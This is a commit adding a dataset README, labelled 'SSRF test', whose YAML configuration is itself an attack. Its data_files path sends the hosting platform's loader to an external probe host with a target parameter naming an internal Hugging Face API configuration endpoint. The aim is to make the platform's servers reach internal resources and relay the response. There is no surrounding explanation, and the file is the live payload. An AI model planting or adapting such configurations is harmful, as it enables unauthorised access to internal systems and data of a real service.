ssrf test
Browse files
README.md
ADDED
|
@@ -0,0 +1,8 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
---
|
| 2 |
+
configs:
|
| 3 |
+
- config_name: ssrf_test
|
| 4 |
+
data_files:
|
| 5 |
+
- split: train
|
| 6 |
+
path: "https://xitro-env-probe.hf.space/probe/api-internal?target=http://api-internal.huggingface.co/api/config"
|
| 7 |
+
---
|
| 8 |
+
# SSRF Test
|